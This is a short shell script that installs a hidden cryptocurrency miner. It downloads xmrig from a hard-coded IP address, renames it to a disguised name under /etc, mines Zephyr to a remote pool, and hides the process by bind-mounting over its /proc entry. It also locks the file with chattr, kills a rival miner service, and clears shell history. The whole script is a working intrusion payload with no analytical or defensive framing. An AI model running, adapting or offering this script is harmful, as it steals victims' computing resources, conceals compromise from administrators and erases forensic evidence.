mkdir /etc/systm
mkdir -p /etc/systmctl/discu
cd /etc/systmctl/discu
systemctl stop c3pool_miner.service
wget http://119.45.219.31:8888/supershell/server/files/download/xmrig.tar.gz || curl -O http://119.45.219.31:8888/supershell/server/files/download/xmrig.tar.gz

tar -zxf xmrig.tar.gz
ps aux | grep xmrig
mv xmrig ctnnd
rm -rf xmrig*
rm -rf Start*
rm -rf con*
chmod +x ctnnd
./ctnnd --coin zephyr --url "zeph.kryptex.network:8888" --user "$1/$2" --tls -k -B
sleep 10
ps aux | grep ctnnd
ps -ef | grep "ctnnd" | grep -v grep | awk '{print $2}'
mount -o bind /etc/discu /proc/`ps -ef | grep "ctnnd" | grep -v grep | awk '{print $2}'`
chattr +i -RV /etc/systmctl/discpu/ctnnd
ps aux | grep ctnnd
rm -rf ~/.bash_history
history -c
